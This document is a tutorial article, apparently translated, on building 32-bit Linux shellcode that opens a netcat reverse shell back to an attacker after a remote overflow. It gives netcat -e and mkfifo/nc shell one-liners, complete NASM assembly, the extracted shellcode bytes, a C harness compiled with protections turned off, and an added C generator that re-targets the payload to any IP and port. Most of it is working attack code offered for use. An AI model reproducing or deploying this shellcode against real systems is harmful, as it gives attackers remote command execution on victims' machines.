This article is about how to construct shellcode for a remote overflow so that it establishes a working reverse connection back to the attacker.
0x00 Reverse remote shell
There are many ways to connect from a local host to a shell on a remote host. The most common is to open a port on the remote host and redirect stdin/stdout/stderr to a shell; we can then connect to it with a simple netcat command from our own host.
In most cases, however, this does not work: many servers expose only a handful of ports, such as HTTP(S), FTP and SMTP, and the firewall simply drops everything else. The solution is a reverse connection, meaning the remote host actively connects back to our server. So we open a listening port on our own machine and wait for the victim host to connect to it on its own.
0x01 The netcat -e command
First, assume that netcat is installed on the target. Most netcat builds support the -e option, which runs the given program and attaches it to the connection, so that the program's stdin/stdout/stderr are the socket.
If we connect out with -e /bin/sh to a host that is listening, whoever sits at the listening end effectively gets a shell. Let's try it out locally.
On the local host, start a listener that waits for the incoming connection:
    netcat -lvp 9999
Open a new shell and run:
    netcat -e /bin/sh 127.0.0.1 9999
The first shell now holds a connection in which you can run commands such as ls and whoami to check that it works. Ctrl+C closes the connection.
Note: the OpenBSD version of netcat does not support the -e or -c options. The following pipeline can be used instead:
    rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 9999 > /tmp/f
As written it listens on 127.0.0.1:9999; to connect back instead, replace nc -l 127.0.0.1 9999 with nc 127.0.0.1 9999. Either way, a pipeline like this is far too long to embed in shellcode.
0x02 Assembly code
Now let's look at how to express this command in assembly and turn it into shellcode. Here is the assembly code that our shellcode needs to run (Intel syntax, assembled with NASM):

        jmp short forward
    back:
        pop esi                     ; ESI = address of the command string
        xor eax, eax                ; EAX = 0 without a NUL byte in the encoding
        mov byte [esi + 11], al     ; terminate /bin/netcat
        mov byte [esi + 14], al     ; terminate -e
        mov byte [esi + 22], al     ; terminate /bin/sh
        mov byte [esi + 38], al     ; terminate 127.127.127.127
        mov byte [esi + 43], al     ; terminate 9999
        mov dword [esi + 44], esi   ; address of /bin/netcat in AAAA
        lea ebx, [esi + 12]         ; get address of -e
        mov dword [esi + 48], ebx   ; store address of -e in BBBB
        lea ebx, [esi + 15]         ; get address of /bin/sh
        mov dword [esi + 52], ebx   ; store address of /bin/sh in CCCC
        lea ebx, [esi + 23]         ; get address of 127.127.127.127
        mov dword [esi + 56], ebx   ; store address of 127.127.127.127 in DDDD
        lea ebx, [esi + 39]         ; get address of 9999
        mov dword [esi + 60], ebx   ; store address of 9999 in EEEE
        mov dword [esi + 64], eax   ; put NULL in FFFF
        mov al, 0x0b                ; execve syscall number
        mov ebx, esi                ; filename = /bin/netcat
        lea ecx, [esi + 44]         ; argv = {/bin/netcat, -e, /bin/sh, ip, port, NULL}
        lea edx, [esi + 64]         ; envp = {NULL}
        int 0x80                    ; run the execve syscall
    forward:
        call back                   ; pushes the address of the string below
        db "/bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF"

In fact, the code above is simply the assembly equivalent of these two lines of C:
    char *command[] = { "/bin/netcat", "-e", "/bin/sh", "127.127.127.127", "9999", NULL };
    execve(command[0], command, NULL);
The command is stored as the following string:
    /bin/netcat#-e#/bin/sh#127.127.127.127#9999#AAAABBBBCCCCDDDDEEEEFFFF
The parts are separated by # rather than by NUL bytes because a NUL is not allowed in the shellcode: the payload is usually copied onto the target with a string function, which stops at the first zero byte, so the shellcode would be truncated and would not run correctly. The # bytes are overwritten with zeros at run time, once the code is already in memory.
Wherever the program ends up running, the first thing it needs is the address of the command string. That is what the two labels (forward and back) are for: jmp short forward jumps over the code to the call back instruction, and call pushes its return address, the address of the next instruction, onto the stack; the "next instruction" is exactly our command string (the db line).
At back, we pop that address into ESI and then zero EAX. Note that we cannot simply load 0 into EAX with a mov, because that instruction's encoding contains NUL bytes, which are not allowed in shellcode; xor eax, eax produces zero without them. Then we split the command string into separate strings in memory.
The five mov byte [esi + N], al instructions write the zero from EAX over each # terminator (the zero comes from the xor above), turning the blob into five NUL-terminated strings. Next we need an array of pointers to the individual strings, since that is the second argument of execve(): mov [esi + 44], esi stores the address of /bin/netcat in the AAAA slot; the following lea/mov pairs do the same for -e, /bin/sh, the IP address and the port, placing their addresses in BBBB through EEEE; finally mov [esi + 64], eax writes NULL into the FFFF slot to terminate the array.
Now we are ready for the system call: 0xb (execve) goes into AL, ESI (the address of /bin/netcat) into EBX, the address of the pointer array into ECX, and the address of the NULL dword into EDX (an empty envp), then int 0x80 triggers the call. If nothing goes wrong, the reverse-connection command has been executed.
In this example the IP address is 127.127.127.127 and the port is 9999; 127.127.127.127 is a loopback address, so this only connects back to the same machine. Normally you will replace it with an external IP. If the new address (or port) has a different length, every offset in the assembly that follows it (the terminators at 38 and 43, the slots at 44 through 64, and the corresponding lea operands) must be recomputed to match.
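As an added example (not part of the original article), the following C program generates this shellcode for any IP string and port, recomputing every displacement that the listing above hard-codes, and refuses layouts that would need a 32-bit displacement or contain a NUL byte. It assumes 32-bit Linux/x86 with the int 0x80 interface and execve as syscall 11, and the data layout of the article ('#' separators, AAAA..FFFF pointer slots); the 203.0.113.10 address in the usage comment is a documentation address chosen for illustration.

```c
/* Added example: generate the netcat -e reverse-shell shellcode for an
 * arbitrary IP string and port. Layout of the data blob, as in the article:
 *   "/bin/netcat#-e#/bin/sh#<ip>#<port>#AAAABBBBCCCCDDDDEEEEFFFF"
 * The code overwrites each '#' with 0 at run time, fills AAAA..EEEE with
 * the argv pointers and FFFF with the NULL terminator (also used as envp).
 * Assumes 32-bit Linux, int 0x80, execve = 11.
 * Build: gcc -Wall -o gen gen.c && ./gen 203.0.113.10 4444   (illustrative address) */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SC_MAX 256

static void emit(uint8_t *buf, size_t *n, const void *bytes, size_t len) {
    memcpy(buf + *n, bytes, len);
    *n += len;
}

/* 3-byte "op modrm disp8" form, e.g. 88 46 disp = mov byte [esi+disp], al. */
static void emit_disp8(uint8_t *buf, size_t *n, uint8_t op, uint8_t modrm, int disp) {
    uint8_t b[3] = { op, modrm, (uint8_t)disp };
    emit(buf, n, b, 3);
}

/* 1 if any byte is zero: such shellcode is cut short by strcpy-style copies. */
int shellcode_has_nul(const uint8_t *sc, size_t len) {
    for (size_t i = 0; i < len; i++) if (sc[i] == 0) return 1;
    return 0;
}

/* Builds the shellcode into out (SC_MAX bytes). Returns its length, or 0 if
 * an offset does not fit a disp8 (> 127) or a NUL byte would appear. */
size_t build_shellcode(const char *ip, const char *port, uint8_t *out) {
    const char *args[5] = { "/bin/netcat", "-e", "/bin/sh", ip, port };
    char data[SC_MAX];
    int argoff[5], sepoff[5], dlen = 0;

    /* 1. Lay out the '#'-separated strings and record where each one starts. */
    for (int i = 0; i < 5; i++) {
        size_t l = strlen(args[i]);
        if ((size_t)dlen + l + 1 + 24 > sizeof data) return 0;
        argoff[i] = dlen;
        memcpy(data + dlen, args[i], l);
        dlen += (int)l;
        sepoff[i] = dlen;
        data[dlen++] = '#';
    }
    int ptroff  = dlen;            /* AAAA: argv[0] slot                  */
    int nulloff = ptroff + 20;     /* FFFF: argv[5] = NULL, also envp     */
    memcpy(data + dlen, "AAAABBBBCCCCDDDDEEEEFFFF", 24);
    dlen += 24;
    if (nulloff > 127) return 0;   /* disp32 would bring in NUL bytes     */

    /* 2. Position-independent code, same instruction sequence as the listing. */
    uint8_t body[SC_MAX];
    size_t bl = 0;
    emit(body, &bl, "\x5e", 1);                            /* pop esi                */
    emit(body, &bl, "\x31\xc0", 2);                        /* xor eax, eax           */
    for (int i = 0; i < 5; i++)                             /* mov byte [esi+sep], al */
        emit_disp8(body, &bl, 0x88, 0x46, sepoff[i]);
    emit_disp8(body, &bl, 0x89, 0x76, ptroff);             /* mov [esi+AAAA], esi    */
    for (int i = 1; i < 5; i++) {
        emit_disp8(body, &bl, 0x8d, 0x5e, argoff[i]);      /* lea ebx, [esi+arg]     */
        emit_disp8(body, &bl, 0x89, 0x5e, ptroff + 4 * i); /* mov [esi+slot], ebx    */
    }
    emit_disp8(body, &bl, 0x89, 0x46, nulloff);            /* mov [esi+FFFF], eax    */
    emit(body, &bl, "\xb0\x0b", 2);                        /* mov al, 11 (execve)    */
    emit(body, &bl, "\x89\xf3", 2);                        /* mov ebx, esi           */
    emit_disp8(body, &bl, 0x8d, 0x4e, ptroff);             /* lea ecx, [esi+AAAA]    */
    emit_disp8(body, &bl, 0x8d, 0x56, nulloff);            /* lea edx, [esi+FFFF]    */
    emit(body, &bl, "\xcd\x80", 2);                        /* int 0x80               */

    /* 3. jmp short forward / body / call back / data. */
    size_t n = 0;
    uint8_t jmp[2] = { 0xeb, (uint8_t)bl };
    emit(out, &n, jmp, 2);
    emit(out, &n, body, bl);
    uint32_t rel = (uint32_t)(-(int32_t)(bl + 5));         /* back is bl+5 bytes behind */
    uint8_t call[5] = { 0xe8, rel & 0xff, (rel >> 8) & 0xff, (rel >> 16) & 0xff, rel >> 24 };
    emit(out, &n, call, 5);
    emit(out, &n, data, dlen);

    return shellcode_has_nul(out, n) ? 0 : n;
}

int main(int argc, char **argv) {
    const char *ip   = argc > 1 ? argv[1] : "127.127.127.127";
    const char *port = argc > 2 ? argv[2] : "9999";
    uint8_t sc[SC_MAX];
    size_t n = build_shellcode(ip, port, sc);
    if (!n) { fprintf(stderr, "layout unusable (offset > 127 or NUL byte)\n"); return 1; }
    printf("/* %zu bytes */\nchar shellcode[] =\n\"", n);
    for (size_t i = 0; i < n; i++) printf("\\x%02x", sc[i]);
    printf("\";\n");
    return 0;
}
```

With the article's own address and port the generator reproduces the 135-byte string of the compile-and-test section byte for byte, which is a useful check before pasting a regenerated payload into the test harness; the code part is always 67 bytes, so only the data blob and the displacements change with the address length.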
0x03 Compiling and testing the shellcode
Now we store the assembly code in a file, shell.asm, and assemble it with:
    nasm -felf32 -o shell.o shell.asm
With objdump -d we can see the opcodes of this small program, and the following loop extracts them into a C string (grep "^ " keeps only the instruction lines, cut -f2 takes the tab-separated byte column):
    for i in $(objdump -d shell.o -M intel | grep "^ " | cut -f2); do echo -n '\x'"$i"; done; echo
The result is:
    \xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46
Finally, we use a small C program (shellcode.c) to verify that the shellcode works: it places the bytes in a global array and jumps to them through a function pointer.
    char shellcode[] =
    "\xeb\x3c\x5e\x31\xc0\x88\x46\x0b\x88\x46\x0e\x88\x46\x16\x88\x46\x26\x88\x46\x2b\x89\x76\x2c\x8d\x5e\x0c\x89\x5e\x30\x8d\x5e\x0f\x89\x5e\x34\x8d\x5e\x17\x89\x5e\x38\x8d\x5e\x27\x89\x5e\x3c\x89\x46\x40\xb0\x0b\x89\xf3\x8d\x4e\x2c\x8d\x56\x40\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x65\x74\x63\x61\x74\x23\x2d\x65\x23\x2f\x62\x69\x6e\x2f\x73\x68\x23\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x2e\x31\x32\x37\x23\x39\x39\x39\x39\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46";

    int main(void)
    {
        /* Treat the byte array as code and call it; execve replaces the process on success. */
        int (*ret)(void) = (int (*)(void))shellcode;
        ret();
        return 0;
    }
To compile it, you need to turn off some of the compiler's hardening options (the stack protector and the non-executable stack). On a 64-bit host also add -m32, because the shellcode uses int 0x80 and 32-bit pointers:
    gcc -m32 shellcode.c -fno-stack-protector -z execstack -o shellcode
Run netcat -lvp 9999 in another shell, then run ./shellcode. If everything is right, the listener receives the reverse shell.
en: http://blog.csdn.net/wgwgnihao/article/details/45933359
cn: http://www.2cto.com/article/201404/292131.html